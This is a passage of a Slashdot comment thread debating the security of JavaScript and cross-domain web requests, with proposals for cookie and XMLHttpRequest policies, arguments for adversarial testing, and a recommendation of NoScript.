* cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

* XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

Scripts, yes. I don't see the need to ensure that data originates in the same domain.

Old truths new truths... (1)

CodeShark (17400) | about 7 years ago | (#18575679)

AKA, the security programmer's favorite adage: "The user is the enemy."


That is, when ANY new technique or code module is to be used in a production environment, it should not be considered ready until it has been thoroughly attacked by a person who has the kind of mind-set that will expose code vulnerabilities before a user (or set of users) finds them.

Trouble is, most IT organizations have a hard sell to get that type of person within the company -- first, because an "inside the firewall" attacker is counter-intuitive to the idea that a company should trust their employees, and second, the position seems redundant IF the programmers are up to speed on writing secure applications. Which -- catch 22 here -- they won't know until it is too late. Secondarily, inside the wire attackers are much more dangerous than outside attackers, because the inside the wire person comes to know exactly what is vulnerable, and what can be done with that knowledge.

Any thoughts?

Executing 3rd party code by default is insecure? (1)

freezin fat guy (713417) | about 7 years ago | (#18575723)

Fortunately the web development community has learned so much from the ongoing ramifications of Microsoft's "features first, security later" approach in the 90's that we would never recreate such a mess. Oh wait - automatic, default execution of third party code on the client browser, INSIDE THE FIREWALL? What could possibly go wrong with that?

The arguments today also mirror what went on with Windows and Outlook in the 90's. A few wild haired prophets screaming doom and gloom but 99.9% of the IT community was/is hypnotized by the glamour of "features, features, features" and security is relegated to patching. Like building a submarine out of swiss cheese. You'll spend the rest of your life patching but if everyone does it, it's normal. A few weirdos will look up and say "why don't we just start with a less porous base material?" but they will be shouted down by the masses.

Javascript, Flash and Applets are insecure by concept. Oh, pardon me, sandboxes will take care of everything? Append an image to the DOM from your server. If that "image" is actually a program which reads the query string you can pass it any information you want. Sandbox jumped. Not a bug, a feature.

It's not enough to patch websites. It only takes one popular compromised site to infect thousands or even millions of users. Do I trust every site on the internet to be 100% invulnerable 24/7? Not really. Not even the sites I work on.

Most BANKS and financial services require Javascript to log in. Nice to know such critical web services are designed by people who "care about customer security." (cough, cough)

NoScript [noscript.net] seems to be a reasonable compromise. No browser I'm aware of takes this approach by default.

Re:Executing 3rd party code by default is insecure (0)

Anonymous Coward | about 7 years ago | (#18576393)

Certain aspects of JavaScript, Flash, and Applets when misused can lead to insecure web applications


There, I fixed that for you. But feel free to continue to make sweeping generalizations - that way my contention that 95% of all developers are idiots will continue to be correct.

Re:Executing 3rd party code by default is insecure (2, Funny)

nuzak (959558) | about 7 years ago | (#18576809)

> Like building a submarine out of swiss cheese.

I suspect a submarine built out of a nice solid gruyere would probably not be terribly seaworthy either. When it comes to the structural integrity of hull materials, cheese tends to rank pretty low.

I'm still waiting! (1)

StarfishOne (756076) | about 7 years ago | (#18575879)

I'm still waiting for someone to come up with a nice pun involving the title of this news item and Steven Seagal! :D

I'm out for justice ;D
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...